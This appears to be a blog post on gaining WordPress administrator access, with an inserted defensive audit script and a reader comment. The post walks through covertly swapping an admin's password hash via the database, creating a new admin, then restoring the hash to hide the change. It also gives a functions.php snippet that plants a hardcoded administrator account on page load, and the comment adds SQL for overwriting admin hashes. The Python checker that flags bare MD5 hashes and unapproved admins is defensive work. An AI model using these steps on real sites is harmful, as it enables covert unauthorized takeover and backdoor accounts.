Gaining Admin Access

This is one of my favorite things to do. You need either FTP access or database access to escalate your privileges to an administrator.

Gain access through the database

 

  1. Log into a database manager.
  2. Click on the wp_users table.
  3. The user_pass column will contain random-looking values such as $P$BqCGBzQOJ4AHFp.2UCVafZE5q3eXNC1. This is a password hash generated with phpass. We’re going to replace it with an MD5 hash of a password. WordPress will automatically convert the hash to look like the others once we log in.
  4. To generate a random password and the associated hash, type “ow --md5 --random” on a command line. You can also do this online here.
  5. If you’ve forgotten your password and want to permanently replace it, replace the hash with the one you just generated, and you’re done. If you want to escalate your privileges, ignore this step and continue on.
  6. Copy the hash of an administrative user and put it in a text file.
  7. Change the hash to the one you just generated.
  8. In a new tab, log in to this WordPress account with the newly generated password that goes with the hash.
  9. Once logged in, create yourself an admin user.
  10. Go back to the database manager and replace the admin password we changed with the hash that was copied to a text file. This will restore their password.
  11. You now have admin access, and you didn’t have to permanently change anyone else’s password!

Gain access through FTP

Add this snippet to the theme’s functions.php file (located at /wp-content/current-theme-name/functions.php), and then visit the website to trigger the code and create yourself an admin user. You can then delete this code from the functions.php file and log in to your new admin account.

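// Creates an administrator account on the next page load, unless the
// login or the email address is already registered.
function add_admin_acct(){
	$login = 'myacct1';
	$passw = 'mypass1';
	$email = 'you@example.com'; // placeholder address; use one you control

	if ( !username_exists( $login )  && !email_exists( $email ) ) {
		$user_id = wp_create_user( $login, $passw, $email );
		// wp_create_user() returns a WP_Error on failure; only promote a real user ID.
		if ( !is_wp_error( $user_id ) ) {
			$user = new WP_User( $user_id );
			$user->set_role( 'administrator' );
		}
	}
}
// Runs on every request through the init hook.
add_action('init','add_admin_acct');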
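
A defender's check for both routes above, added here as an example that is not part of the original post: it flags any bare MD5 value left in user_pass and any administrator missing from an approved list. The sample rows, the approved list and the finding labels are constructed for illustration.

```python
import hashlib
import re

# A bare 32-hex MD5 in user_pass: WordPress accepts it and rehashes it on the
# next login, so one still sitting in the table was written directly to the DB.
MD5_RE = re.compile(r"[0-9a-fA-F]{32}")
# Entry in the PHP-serialized wp_capabilities value that grants the admin role.
ADMIN_RE = re.compile(r's:13:"administrator";b:1;')


def is_bare_md5(user_pass):
    return MD5_RE.fullmatch(user_pass) is not None


def is_admin(capabilities):
    return ADMIN_RE.search(capabilities or "") is not None


def audit(rows, approved_admins):
    """Return sorted (user_login, finding) pairs for accounts needing review."""
    findings = []
    for row in rows:
        if is_bare_md5(row["user_pass"]):
            findings.append((row["user_login"], "bare-md5-hash"))
        if is_admin(row["capabilities"]) and row["user_login"] not in approved_admins:
            findings.append((row["user_login"], "unapproved-administrator"))
    return sorted(findings)


# Constructed sample export: wp_users joined with each user's wp_capabilities
# row from wp_usermeta. Hash values are placeholders, not real credentials.
SAMPLE_ROWS = [
    {"user_login": "siteowner", "user_pass": "$P$BqCGBzQOJ4AHFp.2UCVafZE5q3eXNC1",
     "capabilities": 'a:1:{s:13:"administrator";b:1;}'},
    {"user_login": "editor1",
     "user_pass": hashlib.md5(b"constructed-sample").hexdigest(),
     "capabilities": 'a:1:{s:6:"editor";b:1;}'},
    {"user_login": "myacct1", "user_pass": "$P$B" + "a" * 30,
     "capabilities": 'a:1:{s:13:"administrator";b:1;}'},
    {"user_login": "writer", "user_pass": "$P$B" + "b" * 30,
     "capabilities": 'a:1:{s:6:"author";b:1;}'},
]
APPROVED_ADMINS = {"siteowner"}  # hypothetical list kept outside the database

if __name__ == "__main__":
    for login, finding in audit(SAMPLE_ROWS, APPROVED_ADMINS):
        print(f"{login}: {finding}")
```

Once the original hash has been put back, user_pass shows nothing unusual, so the approved-list comparison is the check that still catches the added account.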

One thought on “Gaining Admin Access”

  1. Get users:
    SELECT u.ID, u.user_login
    FROM wp_users u, wp_usermeta m
    WHERE u.ID = m.user_id
    AND m.meta_key LIKE 'wp_capabilities'
    AND m.meta_value LIKE '%administrator%'

    Get password
    select user_pass from wp_users where ID=;

    hash: hu md5

    Update password
    update wp_users SET user_pass = '' where ID=;

    Verify:
    select * from wp_users where ID=;
